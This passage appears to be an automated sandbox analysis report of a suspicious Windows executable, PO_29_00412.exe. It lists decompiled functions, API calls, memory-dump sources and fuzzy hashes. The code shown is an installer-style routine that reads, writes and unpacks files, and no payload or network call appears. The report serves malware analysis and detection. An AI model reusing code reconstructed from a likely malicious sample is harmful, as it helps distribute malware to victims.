						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                            0x00403196
                                                                            0x0040319f
                                                                            0x004031a8
                                                                            0x004031ac
                                                                            0x004031b7
                                                                            0x004031b7
                                                                            0x004031bf
                                                                            0x004031c6
                                                                            0x004031d8
                                                                            0x004031df
                                                                            0x00403284
                                                                            0x00403284
                                                                            0x00000000
                                                                            0x004031e5
                                                                            0x004031e8
                                                                            0x004031f4
                                                                            0x004031f8
                                                                            0x00403292
                                                                            0x00403292
                                                                            0x004031fe
                                                                            0x00403201
                                                                            0x00403260
                                                                            0x00403266
                                                                            0x00403268
                                                                            0x00403268
                                                                            0x0040327a
                                                                            0x00403282
                                                                            0x00403289
                                                                            0x0040328c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403203
                                                                            0x00403206
                                                                            0x00000000
                                                                            0x0040320c
                                                                            0x00403211
                                                                            0x00403218
                                                                            0x0040321b
                                                                            0x0040321d
                                                                            0x0040321d
                                                                            0x0040322a
                                                                            0x00403234
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040323d
                                                                            0x00403244
                                                                            0x0040325c
                                                                            0x00403286
                                                                            0x00403286
                                                                            0x00403246
                                                                            0x00403246
                                                                            0x00403249
                                                                            0x0040324c
                                                                            0x00403252
                                                                            0x00403258
                                                                            0x00000000
                                                                            0x0040325a
                                                                            0x00000000
                                                                            0x0040325a
                                                                            0x00403258
                                                                            0x00000000
                                                                            0x00403244
                                                                            0x00000000
                                                                            0x00403211
                                                                            0x00403206
                                                                            0x00403201
                                                                            0x004031f8
                                                                            0x004031df
                                                                            0x00403294
                                                                            0x00403297

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                                            • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                                                            • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                                                            • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}










                                                                            0x0040138a
                                                                            0x004013fa
                                                                            0x0040139b
                                                                            0x004013a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004013a2
                                                                            0x004013a3
                                                                            0x004013ad
                                                                            0x00000000
                                                                            0x00401404
                                                                            0x004013b0
                                                                            0x004013b7
                                                                            0x004013bd
                                                                            0x004013be
                                                                            0x004013c0
                                                                            0x004013c2
                                                                            0x004013b9
                                                                            0x004013b9
                                                                            0x004013ba
                                                                            0x004013ba
                                                                            0x004013c9
                                                                            0x004013cb
                                                                            0x004013f4
                                                                            0x004013f4
                                                                            0x004013c9
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                                            • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                                                            • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                                                            • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                            0x00406639
                                                                            0x0040663c
                                                                            0x00406643
                                                                            0x0040664b
                                                                            0x00406657
                                                                            0x00000000
                                                                            0x0040665e
                                                                            0x0040664e
                                                                            0x00406655
                                                                            0x00000000
                                                                            0x00406666
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                                              • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32 ref: 004065DA
                                                                              • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                                                              • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                            • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                                                            • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                            • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 68%
                                                                            			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                            0x00405dc5
                                                                            0x00405dd2
                                                                            0x00405de7
                                                                            0x00405ded

                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00405DC5
                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                            • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                            • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                            • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                            0x00405da1
                                                                            0x00405da7
                                                                            0x00405dac
                                                                            0x00405db5
                                                                            0x00405db5
                                                                            0x00405dbe

                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                            • Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
                                                                            • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                            • Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                            0x00405898
                                                                            0x004058a0
                                                                            0x00000000
                                                                            0x004058a6
                                                                            0x00000000

                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
                                                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                            • Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
                                                                            • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                            • Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x00405e6c
                                                                            0x00405e7c
                                                                            0x00405e84
                                                                            0x00000000
                                                                            0x00405e8b
                                                                            0x00000000
                                                                            0x00405e8d

                                                                            APIs
                                                                            • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040EF51,0040B8F8,0040339A,0040B8F8,0040EF51,004138F8,00004000,?,00000000,004031C4,00000004), ref: 00405E7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                            • Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                            0x00405e3d
                                                                            0x00405e4d
                                                                            0x00405e55
                                                                            0x00000000
                                                                            0x00405e5c
                                                                            0x00000000
                                                                            0x00405e5e

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403416,0040A130,0040A130,0040331A,004138F8,00004000,?,00000000,004031C4), ref: 00405E4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                            • Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
                                                                            • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                            • Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                            0x00403427
                                                                            0x0040342d

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                            • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                            • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                            • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                            0x00405493
                                                                            0x0040549b
                                                                            0x0040549e
                                                                            0x004054a6
                                                                            0x004054a9
                                                                            0x00405638
                                                                            0x0040563e
                                                                            0x00405662
                                                                            0x00405662
                                                                            0x0040566e
                                                                            0x00405674
                                                                            0x00405696
                                                                            0x00405696
                                                                            0x0040569c
                                                                            0x004056f1
                                                                            0x004056f1
                                                                            0x004056f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004056f6
